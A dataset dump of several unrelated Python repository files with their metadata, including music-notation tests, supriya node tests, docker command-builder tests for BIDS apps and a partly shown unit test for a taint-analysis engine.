| 0.121422
| 0.182075
| 4,954
| 102
| 95
| 48.568627
| 0.628825
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.031915
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f492053f9fc9b2894b027e98714c8641adf16be5
| 172
|
py
|
Python
|
librespot/audio/HaltListener.py
|
JeffmeisterJ/librespot-python
|
0e0e1db65aa40262bd13479b97f81ae8c29ae049
|
[
"Apache-2.0"
] | 1
|
2021-12-15T22:44:46.000Z
|
2021-12-15T22:44:46.000Z
|
librespot/audio/HaltListener.py
|
JeffmeisterJ/librespot-python
|
0e0e1db65aa40262bd13479b97f81ae8c29ae049
|
[
"Apache-2.0"
] | 12
|
2021-10-06T02:18:44.000Z
|
2022-02-07T02:16:47.000Z
|
librespot/audio/HaltListener.py
|
JeffmeisterJ/librespot-python
|
0e0e1db65aa40262bd13479b97f81ae8c29ae049
|
[
"Apache-2.0"
] | null | null | null |
class HaltListener:
def stream_read_halted(self, chunk: int, _time: int) -> None:
pass
def stream_read_resumed(self, chunk: int, _time: int):
pass
| 24.571429
| 65
| 0.651163
| 23
| 172
| 4.608696
| 0.565217
| 0.169811
| 0.245283
| 0.301887
| 0.358491
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 172
| 6
| 66
| 28.666667
| 0.821705
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0.4
| 0
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
76122c49745cad4b7d60650d80d33345a41c028f
| 4,920
|
py
|
Python
|
test/test_SegmentMaker_rehearsal_mark.py
|
josiah-wolf-oberholtzer/consort
|
6c7d511835d5ad883ad1ad52ae9cd48c4a7b5571
|
[
"MIT"
] | 9
|
2015-02-11T09:35:40.000Z
|
2019-04-29T23:57:49.000Z
|
test/test_SegmentMaker_rehearsal_mark.py
|
josiah-wolf-oberholtzer/consort
|
6c7d511835d5ad883ad1ad52ae9cd48c4a7b5571
|
[
"MIT"
] | 2
|
2016-02-07T18:54:47.000Z
|
2017-08-10T01:38:01.000Z
|
test/test_SegmentMaker_rehearsal_mark.py
|
josiah-wolf-oberholtzer/consort
|
6c7d511835d5ad883ad1ad52ae9cd48c4a7b5571
|
[
"MIT"
] | 1
|
2019-05-13T12:37:15.000Z
|
2019-05-13T12:37:15.000Z
|
import abjad
import collections
import consort
from abjad.tools import systemtools
from abjad.tools import templatetools
segment_metadata = collections.OrderedDict(
segment_count=3,
segment_number=2,
)
def test_SegmentMaker_rehearsal_mark_01():
segment_maker = consort.SegmentMaker(
discard_final_silence=True,
desired_duration_in_seconds=4,
omit_stylesheets=True,
score_template=templatetools.GroupedRhythmicStavesScoreTemplate(
staff_count=1,
),
settings=None,
tempo=abjad.MetronomeMark((1, 4), 60),
permitted_time_signatures=((4, 4),),
)
lilypond_file, metadata = segment_maker(
segment_metadata=segment_metadata,
)
assert format(lilypond_file) == abjad.String.normalize(
r'''
\version "2.19.65"
\language "english"
#(ly:set-option 'relative-includes #t)
\score {
\context Score = "Grouped Rhythmic Staves Score" <<
\tag #'time
\context TimeSignatureContext = "Time Signature Context" {
{
\tempo 4=60
\time 4/4
\mark \markup {
\box
\pad-around
#0.5
\caps
A
}
s1 * 1
}
}
\context StaffGroup = "Grouped Rhythmic Staves Staff Group" <<
\context RhythmicStaff = "Staff 1" {
\bar "||"
\context Voice = "Voice 1" {
{
% [Voice 1] Measure 1
{
\stopStaff
\once \override Staff.StaffSymbol.line-positions = #'(0)
\startStaff
R1 * 1
\stopStaff
\startStaff
}
}
}
}
>>
>>
}
''')
def test_SegmentMaker_rehearsal_mark_02():
segment_maker = consort.SegmentMaker(
discard_final_silence=True,
desired_duration_in_seconds=4,
name='A transitional segment',
omit_stylesheets=True,
score_template=templatetools.GroupedRhythmicStavesScoreTemplate(
staff_count=1,
),
settings=None,
tempo=abjad.MetronomeMark((1, 4), 60),
permitted_time_signatures=((4, 4),),
)
lilypond_file, metadata = segment_maker(
segment_metadata=segment_metadata,
)
assert format(lilypond_file) == abjad.String.normalize(
r'''
\version "2.19.65"
\language "english"
#(ly:set-option 'relative-includes #t)
\score {
\context Score = "Grouped Rhythmic Staves Score" <<
\tag #'time
\context TimeSignatureContext = "Time Signature Context" {
{
\tempo 4=60
\time 4/4
\mark \markup {
\concat
{
\box
\pad-around
#0.5
\caps
A
" "
\fontsize
#-3
"A transitional segment"
}
}
s1 * 1
}
}
\context StaffGroup = "Grouped Rhythmic Staves Staff Group" <<
\context RhythmicStaff = "Staff 1" {
\bar "||"
\context Voice = "Voice 1" {
{
% [Voice 1] Measure 1
{
\stopStaff
\once \override Staff.StaffSymbol.line-positions = #'(0)
\startStaff
R1 * 1
\stopStaff
\startStaff
}
}
}
}
>>
>>
}
''')
| 34.166667
| 92
| 0.36565
| 306
| 4,920
| 5.738562
| 0.323529
| 0.042711
| 0.047836
| 0.022779
| 0.867882
| 0.831435
| 0.831435
| 0.809795
| 0.809795
| 0.809795
| 0
| 0.03036
| 0.564837
| 4,920
| 143
| 93
| 34.405594
| 0.789818
| 0
| 0
| 0.636364
| 0
| 0
| 0.015079
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 1
| 0.045455
| false
| 0
| 0.113636
| 0
| 0.159091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
525529c8146bbe2f6674245e7fff7556b989a785
| 132
|
py
|
Python
|
software-development/unit-tests/python/start.py
|
fahimfarhan/legendary-coding-odyssey
|
55289e05aa04f866201c607bed00c505cd9c4df9
|
[
"MIT"
] | 3
|
2019-07-20T07:26:31.000Z
|
2020-08-06T09:31:09.000Z
|
software-development/unit-tests/python/start.py
|
fahimfarhan/legendary-coding-odyssey
|
55289e05aa04f866201c607bed00c505cd9c4df9
|
[
"MIT"
] | null | null | null |
software-development/unit-tests/python/start.py
|
fahimfarhan/legendary-coding-odyssey
|
55289e05aa04f866201c607bed00c505cd9c4df9
|
[
"MIT"
] | 4
|
2019-06-20T18:43:32.000Z
|
2020-10-07T16:45:23.000Z
|
def add(a,b):
return a+b
def sub(a,b):
return a-b
def multiply(a,b):
return a*b
def div(a,b):
return a/b
| 11
| 18
| 0.522727
| 28
| 132
| 2.464286
| 0.285714
| 0.231884
| 0.463768
| 0.521739
| 0.710145
| 0.565217
| 0
| 0
| 0
| 0
| 0
| 0
| 0.325758
| 132
| 12
| 19
| 11
| 0.775281
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
5267c953ae0dfbcbbf8e7e55311feec41640fc59
| 1,833
|
py
|
Python
|
tests/nonrealtime/test_nonrealtime_Node_get_parent.py
|
butayama/supriya
|
0c197324ecee4232381221880d1f40e109bb756c
|
[
"MIT"
] | 191
|
2015-11-13T02:28:42.000Z
|
2022-03-29T10:26:44.000Z
|
tests/nonrealtime/test_nonrealtime_Node_get_parent.py
|
butayama/supriya
|
0c197324ecee4232381221880d1f40e109bb756c
|
[
"MIT"
] | 130
|
2016-01-04T16:59:02.000Z
|
2022-02-26T15:37:20.000Z
|
tests/nonrealtime/test_nonrealtime_Node_get_parent.py
|
butayama/supriya
|
0c197324ecee4232381221880d1f40e109bb756c
|
[
"MIT"
] | 22
|
2016-05-04T10:32:16.000Z
|
2022-02-26T19:22:45.000Z
|
import pytest
import supriya.nonrealtime
def test_01():
"""
With Session.at(...) context manager.
"""
session = supriya.nonrealtime.Session()
with session.at(0):
group_one = session.add_group()
group_two = session.add_group()
node = group_one.add_synth()
with session.at(10):
group_two.move_node(node)
with session.at(5):
parent = node.get_parent()
assert parent is group_one
with session.at(15):
parent = node.get_parent()
assert parent is group_two
def test_02():
"""
With offset=... keyword.
"""
session = supriya.nonrealtime.Session()
with session.at(0):
group_one = session.add_group()
group_two = session.add_group()
node = group_one.add_synth()
with session.at(10):
group_two.move_node(node)
parent = node.get_parent(offset=5)
assert parent is group_one
parent = node.get_parent(offset=15)
assert parent is group_two
def test_03():
"""
Without Session.at(...) context manager or offset keyword.
"""
session = supriya.nonrealtime.Session()
with session.at(0):
group_one = session.add_group()
group_two = session.add_group()
node = group_one.add_synth()
with session.at(10):
group_two.move_node(node)
with pytest.raises(ValueError):
node.get_parent()
def test_04():
"""
With both Session.at(...) context manager and offset keyword.
"""
session = supriya.nonrealtime.Session()
with session.at(0):
group_one = session.add_group()
group_two = session.add_group()
node = group_one.add_synth()
with session.at(10):
group_two.move_node(node)
with session.at(5):
parent = node.get_parent(offset=15)
assert parent is group_two
| 25.816901
| 65
| 0.629023
| 240
| 1,833
| 4.608333
| 0.158333
| 0.113924
| 0.141049
| 0.085895
| 0.813743
| 0.768535
| 0.768535
| 0.753165
| 0.701627
| 0.701627
| 0
| 0.021168
| 0.252591
| 1,833
| 70
| 66
| 26.185714
| 0.786131
| 0.099836
| 0
| 0.795918
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 1
| 0.081633
| false
| 0
| 0.040816
| 0
| 0.122449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
870f59b56d6d2f2ec4535f561e62e75df977cd0c
| 128
|
py
|
Python
|
docs/source/tutorial/v2/using_liberty.py
|
mjhajharia/deprecated
|
9893b54d62ad0b164b9d99ee8382d21f32b5f96a
|
[
"MIT"
] | 169
|
2017-12-05T15:22:20.000Z
|
2022-03-08T03:24:56.000Z
|
docs/source/tutorial/v2/using_liberty.py
|
mjhajharia/deprecated
|
9893b54d62ad0b164b9d99ee8382d21f32b5f96a
|
[
"MIT"
] | 48
|
2018-06-21T22:39:37.000Z
|
2022-01-07T17:57:59.000Z
|
docs/source/tutorial/v2/using_liberty.py
|
mjhajharia/deprecated
|
9893b54d62ad0b164b9d99ee8382d21f32b5f96a
|
[
"MIT"
] | 23
|
2018-06-21T22:36:48.000Z
|
2021-12-22T19:31:18.000Z
|
# coding: utf-8
import liberty
liberty.print_value("hello")
liberty.print_value("hello again")
liberty.better_print("Hi Tom!")
| 18.285714
| 34
| 0.765625
| 19
| 128
| 5
| 0.631579
| 0.252632
| 0.357895
| 0.463158
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008547
| 0.085938
| 128
| 6
| 35
| 21.333333
| 0.803419
| 0.101563
| 0
| 0
| 0
| 0
| 0.20354
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0.75
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
8722407eeed6a7de19e1461162738e47d29f6169
| 8,927
|
py
|
Python
|
bidswrapps/tests.py
|
fliem/bidswrapps
|
f643e672b7c1d38b8868cc7c913b0ef9834c30e5
|
[
"Apache-2.0"
] | null | null | null |
bidswrapps/tests.py
|
fliem/bidswrapps
|
f643e672b7c1d38b8868cc7c913b0ef9834c30e5
|
[
"Apache-2.0"
] | null | null | null |
bidswrapps/tests.py
|
fliem/bidswrapps
|
f643e672b7c1d38b8868cc7c913b0ef9834c30e5
|
[
"Apache-2.0"
] | null | null | null |
from bidswrapps.utils import compile_run_cmd
def test_basic():
"""test basic bids app use case"""
analysis_level = "participant"
bids_input_folder = "/bids_in_data"
bids_output_folder = "/bids_out_data"
docker_image = "testorg/testim:dev"
subject_id = ""
docker_volumes = []
runscript_args = ""
runscript_cmd = ""
correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev /data/in " \
"/data/out participant"
cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
assert cmd == correct_cmd, "cmd:\n%s\n does not macht correct cmd:\n%s"%(cmd, correct_cmd)
def test_basic_group():
"""test basic bids app group use case"""
analysis_level = "group"
bids_input_folder = "/bids_in_data"
bids_output_folder = "/bids_out_data"
docker_image = "testorg/testim:dev"
subject_id = ""
docker_volumes = []
runscript_args = ""
runscript_cmd = ""
correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev /data/in " \
"/data/out group"
cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
assert cmd == correct_cmd, "cmd:\n%s\n does not macht correct cmd:\n%s"%(cmd, correct_cmd)
def test_basic_group_noro():
"""test basic bids app group use case withou input ro"""
analysis_level = "group"
bids_input_folder = "/bids_in_data"
bids_output_folder = "/bids_out_data"
docker_image = "testorg/testim:dev"
subject_id = ""
docker_volumes = []
runscript_args = ""
runscript_cmd = ""
input_ro=False
correct_cmd = "docker run -v /bids_in_data:/data/in -v /bids_out_data:/data/out testorg/testim:dev /data/in " \
"/data/out group"
cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd,\
input_ro=input_ro)
assert cmd == correct_cmd, "cmd:\n%s\n does not macht correct cmd:\n%s"%(cmd, correct_cmd)
def test_additional_vols():
"""test additional mount vol use case"""
analysis_level = "participant"
bids_input_folder = "/bids_in_data"
bids_output_folder = "/bids_out_data"
docker_image = "testorg/testim:dev"
subject_id = ""
docker_volumes = ["/project/vol1:/data/vol1", "/project/vol2:/data/vol2"]
runscript_args = ""
runscript_cmd = ""
correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out -v /project/vol1:/data/vol1 " \
"-v /project/vol2:/data/vol2 testorg/testim:dev /data/in " \
"/data/out participant"
cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
assert cmd == correct_cmd, "cmd:\n%s\n does not macht correct cmd:\n%s"%(cmd, correct_cmd)
def test_participant_label():
"""test participant label"""
analysis_level = "participant"
bids_input_folder = "/bids_in_data"
bids_output_folder = "/bids_out_data"
docker_image = "testorg/testim:dev"
subject_id = "sub-11"
docker_volumes = []
runscript_args = ""
runscript_cmd = ""
correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev /data/in " \
"/data/out participant --participant_label sub-11"
cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
assert cmd == correct_cmd, "cmd:\n%s\n does not macht correct cmd:\n%s"%(cmd, correct_cmd)
def test_multiple_participant_labels():
"""test multiple participant labels"""
analysis_level = "participant"
bids_input_folder = "/bids_in_data"
bids_output_folder = "/bids_out_data"
docker_image = "testorg/testim:dev"
subject_id = ["sub-11", "sub-12"]
docker_volumes = []
runscript_args = ""
runscript_cmd = ""
correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev /data/in " \
"/data/out participant --participant_label sub-11 sub-12"
cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
assert cmd == correct_cmd, "cmd:\n%s\n does not macht correct cmd:\n%s"%(cmd, correct_cmd)
def test_runscript_args():
"""test runscript args"""
analysis_level = "participant"
bids_input_folder = "/bids_in_data"
bids_output_folder = "/bids_out_data"
docker_image = "testorg/testim:dev"
subject_id = ""
docker_volumes = []
runscript_args = "--testarg1 a --testarg2 b"
runscript_cmd = ""
correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev " \
"/data/in /data/out participant --testarg1 a --testarg2 b"
cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
assert cmd == correct_cmd, "cmd:\n%s\n does not macht correct cmd:\n%s"%(cmd, correct_cmd)
def test_runscript_cmd():
"""test runscript cmd"""
analysis_level = "participant"
bids_input_folder = "/bids_in_data"
bids_output_folder = "/bids_out_data"
docker_image = "testorg/testim:dev"
subject_id = ""
docker_volumes = []
runscript_args = ""
runscript_cmd = "python run.py"
correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out testorg/testim:dev " \
"python run.py /data/in /data/out participant"
cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
assert cmd == correct_cmd, "cmd:\n%s\n does not macht correct cmd:\n%s"%(cmd, correct_cmd)
def test_full_cmd():
"""test full cmd"""
analysis_level = "participant"
bids_input_folder = "/bids_in_data"
bids_output_folder = "/bids_out_data"
docker_image = "testorg/testim:dev"
subject_id = "sub-11"
docker_volumes = ["/project/vol1:/data/vol1", "/project/vol2:/data/vol2"]
runscript_args = "--testarg1 a --testarg2 b"
runscript_cmd = "python run.py"
correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out -v /project/vol1:/data/vol1 " \
"-v /project/vol2:/data/vol2 testorg/testim:dev " \
"python run.py /data/in /data/out participant --participant_label sub-11 --testarg1 a --testarg2 b"
cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd)
assert cmd == correct_cmd, "cmd:\n%s\n does not macht correct cmd:\n%s"%(cmd, correct_cmd)
def test_docker_options():
"""test full cmd"""
analysis_level = "participant"
bids_input_folder = "/bids_in_data"
bids_output_folder = "/bids_out_data"
docker_image = "testorg/testim:dev"
subject_id = "sub-11"
docker_volumes = ["/project/vol1:/data/vol1", "/project/vol2:/data/vol2"]
runscript_args = "--testarg1 a --testarg2 b"
runscript_cmd = "python run.py"
docker_opt = "--entrypoint=/bin/bash"
correct_cmd = "docker run -v /bids_in_data:/data/in:ro -v /bids_out_data:/data/out -v /project/vol1:/data/vol1 " \
"-v /project/vol2:/data/vol2 --entrypoint=/bin/bash testorg/testim:dev " \
"python run.py /data/in /data/out participant --participant_label sub-11 --testarg1 a --testarg2 b"
cmd = compile_run_cmd(analysis_level, bids_input_folder, bids_output_folder, docker_image, subject_id,
docker_volumes=docker_volumes, runscript_args=runscript_args, runscript_cmd=runscript_cmd,
docker_opt=docker_opt)
assert cmd == correct_cmd, "cmd:\n%s\n does not macht correct cmd:\n%s"%(cmd, correct_cmd)
| 45.085859
| 118
| 0.681976
| 1,228
| 8,927
| 4.637622
| 0.057818
| 0.070237
| 0.104302
| 0.066725
| 0.93626
| 0.93626
| 0.93626
| 0.926427
| 0.923266
| 0.923266
| 0
| 0.007843
| 0.200179
| 8,927
| 197
| 119
| 45.314721
| 0.789776
| 0.030469
| 0
| 0.824324
| 0
| 0.087838
| 0.332287
| 0.095188
| 0
| 0
| 0
| 0
| 0.067568
| 1
| 0.067568
| false
| 0
| 0.006757
| 0
| 0.074324
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
873d718b6b4a9ce596cb21dfe1128d1d96348755
| 42,114
|
py
|
Python
|
test/unit_test.py
|
lwzSoviet/finale
|
6166bee0ddbd1d886abccee0c1c699eaf8f53040
|
[
"MIT"
] | 2
|
2021-07-13T12:13:36.000Z
|
2021-11-14T04:43:47.000Z
|
test/unit_test.py
|
lwzSoviet/finale
|
6166bee0ddbd1d886abccee0c1c699eaf8f53040
|
[
"MIT"
] | null | null | null |
test/unit_test.py
|
lwzSoviet/finale
|
6166bee0ddbd1d886abccee0c1c699eaf8f53040
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python2
# -*- coding: utf-8 -*-
"""
@Description: Simple Unit Test
~~~~~~
@Author : pake
@Time : 2021/7/2 10:10
"""
import pytest
from engine import func_equals_classcall, add_node_id, get_node, get_name_value, get_arg_value, \
get_all_assigns, get_all_functiondef, get_all_classdef, get_end_id, get_call_details, is_tracked, is_controllable, \
ins_is_class, get_class_name, Point, gen_chains, Taint
def test_func_equals_classcall():
# call_name, classcall_name
p=[('os.system','ClassCall:System.system'),
('a.system','ClassCall:A.system'),
('pickle.loads','ClassCall:self.loads'),
('self.inital_db','ClassCall:Mysql.inital_db'),]
for i in p:
assert func_equals_classcall(i[0],i[1])==i[1]
def test_add_node_id():
a={'name': 'Module', 'children': [{'name': 'Import', 'children': [{'name': 'alias', 'children': [{'name': 'str(str=os)'}, {'name': 'NoneType'}]}]}, {'name': 'ImportFrom', 'children': [{'name': 'str(str=importlib)'}, {'name': 'alias', 'children': [{'name': 'str(str=import_module)'}, {'name': 'NoneType'}]}, {'name': 'int(int=0)'}]}, {'name': 'ImportFrom', 'children': [{'name': 'str'}, {'name': 'alias', 'children': [{'name': 'str(str=ImproperlyConfigured)'}, {'name': 'NoneType'}]}, {'name': 'int(int=0)'}]}, {'name': 'ImportFrom', 'children': [{'name': 'str'}, {'name': 'alias', 'children': [{'name': 'str(str=upath)'}, {'name': 'NoneType'}]}, {'name': 'int(int=0)'}]}, {'name': 'ImportFrom', 'children': [{'name': 'str'}, {'name': 'alias', 'children': [{'name': 'str(str=module_has_submodule)'}, {'name': 'NoneType'}]}, {'name': 'int(int=0)'}]}, {'name': 'Assign', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=MODELS_MODULE_NAME)'}, {'name': 'Store'}]}, {'name': 'Str', 'children': [{'name': 'str(str=models)'}]}]}, {'name': 'ClassDef', 'children': [{'name': 'str(str=AppConfig)'}, {'name': 'Name', 'children': [{'name': 'str(str=object)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'Expr', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=__init__)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=app_name)'}, {'name': 'NoneType'}]}, {'name': 'arg', 'children': [{'name': 'str(str=app_module)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=name)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Load'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=module)'}, {'name': 'Store'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_module)'}, {'name': 'Load'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=apps)'}, {'name': 'Store'}]}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=hasattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str(str=label)'}]}, {'name': 'list[]'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=label)'}, {'name': 'Store'}]}, {'name': 'Subscript', 'children': [{'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=app_name)'}, {'name': 'Load'}]}, {'name': 'str(str=rpartition)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'list[]'}]}, {'name': 'Index', 'children': [{'name': 'Num', 'children': [{'name': 'int(int=2)'}]}]}, {'name': 'Load'}]}]}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=hasattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str(str=verbose_name)'}]}, {'name': 'list[]'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=verbose_name)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=label)'}, {'name': 'Load'}]}, {'name': 'str(str=title)'}, {'name': 'Load'}]}, {'name': 'list[]'}, {'name': 'list[]'}]}]}, {'name': 'list[]'}]}, {'name': 'If', 'children': [{'name': 'UnaryOp', 'children': [{'name': 'Not'}, {'name': 'Call', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=hasattr)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'Str', 'children': [{'name': 'str(str=path)'}]}, {'name': 'list[]'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=path)'}, {'name': 'Store'}]}, {'name': 'Call', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=_path_from_module)'}, {'name': 'Load'}]}, {'name': 'Name', 'children': [{'name': 'str(str=app_module)'}, {'name': 'Load'}]}, {'name': 'list[]'}]}]}, {'name': 'list[]'}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models_module)'}, {'name': 'Store'}]}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'Assign', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=models)'}, {'name': 'Store'}]}, {'name': 'NameConstant', 'children': [{'name': 'NoneType'}]}]}, {'name': 'list[]'}, {'name': 'NoneType'}]}, {'name': 'FunctionDef', 'children': [{'name': 'str(str=__repr__)'}, {'name': 'arguments', 'children': [{'name': 'arg', 'children': [{'name': 'str(str=self)'}, {'name': 'NoneType'}]}, {'name': 'NoneType'}, {'name': 'list[]'}, {'name': 'list[]'}, {'name': 'NoneType'}, {'name': 'list[]'}]}, {'name': 'Return', 'children': [{'name': 'BinOp', 'children': [{'name': 'Str', 'children': [{'name': 'str'}]}, {'name': 'Mod'}, {'name': 'Tuple', 'children': [{'name': 'Attribute', 'children': [{'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=__class__)'}, {'name': 'Load'}]}, {'name': 'str(str=__name__)'}, {'name': 'Load'}]}, {'name': 'Attribute', 'children': [{'name': 'Name', 'children': [{'name': 'str(str=self)'}, {'name': 'Load'}]}, {'name': 'str(str=label)'}, {'name': 